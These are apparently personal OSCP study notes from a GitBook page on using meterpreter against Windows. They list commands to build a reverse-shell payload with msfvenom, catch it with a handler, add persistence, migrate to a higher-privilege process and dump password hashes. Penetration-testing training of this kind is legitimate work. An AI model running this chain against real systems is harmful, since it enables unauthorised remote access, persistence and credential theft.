Offensive Security Notes

OSCP Checklist
- Privilege Escalation Windows
Menu

Powered by GitBook

On this page

windows persistance module
upgrading a system shell to meterpreter shell
migrate from to another process ID with better permissions
dump all the hashes

Menu

Tools of the Trade

meterpreter

windows persistance module

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe
transfer shell.exe to victim
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST and LPORT
run
background
use exploit/windows/local/persistence
set session 1
run

Now if the shell drops for any reason you can catch it again by use exploit/multi/handler

upgrading a system shell to meterpreter shell

while on the regular system shell through meterpreter do ctrl+z to background it.

type sessions -u 1 which will upgrade the shell. then get back to the upgraded shell with sessions 2

migrate from to another process ID with better permissions

ps to view all the commands and who is running them

migrate $PID of the process permissions you want to use

dump all the hashes

hashdump

Previousmisc NextBloodhound

Last updated 3 years ago